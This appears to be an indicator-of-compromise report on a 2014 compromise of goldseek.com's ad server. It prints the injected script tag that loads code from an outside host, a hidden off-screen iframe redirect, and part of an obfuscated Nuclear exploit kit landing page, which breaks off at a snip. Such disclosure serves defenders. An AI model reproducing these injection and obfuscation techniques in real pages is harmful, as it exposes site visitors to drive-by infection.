IOC - www.goldseek.com 2014-08-28

1. // These redirects started appearing around 2014-08-27
2.  // Webpage at http://advertising.goldseek.com/www/delivery/spcjs.php?id=1&block=1&target=_top has injected JS at the very top of the page
3.  
4.  document.write('<script type="text/javascript" src="http://roberts.REDDOTCORP.CN/js/ads/show_ads.js?ver=4.15.8241"></script>');
5.  
6.  // This request pulls down the following code
7.  
8.  if (document.cookie.indexOf("jessica") == -1) {
9.      document.write("<iframe style='left:-790px;top:-810px;position:absolute;width:45;height:35' src='http://michael.youdaretocare.org/c6c3e4aeytc.html'></iframe>");
10.      document.cookie = "jessica=readed; max-age=28000; path=/";
11.  } else {}
12.  
13.  // and this code in turn brings you to Nuclear EK landing page
14.  
15.  <html>
16.  
17.  <body bgcolor="#33ff00">
18.      <script>
19.          var Eb1v = "OZOoZXZ";
20.          eval('aRU ' + '= t' + 'hi' + 's' + ';');
21.          var cfX48pU = "zk7";
22.          cPTN = "^%1sRqZwSUJp8=] ,{f#_o>Xi@\\!A$T462L-|9k0xH[hQVm\"DMny5jcrIE+:g/Ge';tF)<Wu?l&Y}C*a(7zPNKbdBO.3v";
23.          var VQ6aO = "xGV";
24.          eval('eGv =' + ' "re' + 'pl' + 'ac' + 'e";');
25.          var j3eXay6 = "ictx";
26.          eval('RvhnId' + ' = ' + '/U' + 'l' + 'uN/' + 'g;');
27.          var slbUJp = "h8ua4rH";
28.          n4QVp = function(ybIxto) {
29.              var D8gGeG = "w5dIS";
30.              if (ybIxto == "") {
31.                  var vZAzKcw = "cJn5uH";
32.                  return ybIxto;
33.                  var GHv5oi = "Uracil";
34.              } else {
35.                  var vubdCA = "SH6wezv";
36.                  return ybIxto[eGv](/UluN/g, "");
37.                  var ehQZDv = "jNsAlp";
38.              }
39.              var GrwUF1R = "DSsCmTU";
40.          };
41.          var hSN = "AT5";
42.          KjPl = [
43.              [aRU["n4QVp"]("cUluNoUluNnUluNcUluNaUluNtUluN"), aRU["n4QVp"]("sUluNuUluNbUluNsUluNtUluNrUluN"), aRU["n4QVp"]("dUluNoUluNcUluNuUluNmUluNeUluNnUluNtUluN"), aRU["n4QVp"]("CUluNoUluNlUluNoUluNrUluN"), aRU["n4QVp"]("lUluNeUluNnUluNgUluNtUluNhUluN")],
44.              [aRU["n4QVp"]("eUluNvUluN#UluN3UluN3UluNfUluNfUluN0UluN0UluNaUluNlUluN"), aRU["n4QVp"]("wUluNiUluNnUluN#UluN3UluN3UluNfUluNfUluN0UluN0UluNdUluNoUluNwUluN"), aRU["n4QVp"]("rUluNeUluNpUluNlUluNaUluNcUluNeUluN")]
45.          ];
46.          var ZVUB = "Ho23";
47.          TkiWqo = function() {
48.                  var j394;
49.                  eval('QtqZr6' + '="' +
50.  
51.  <--- SNIP --->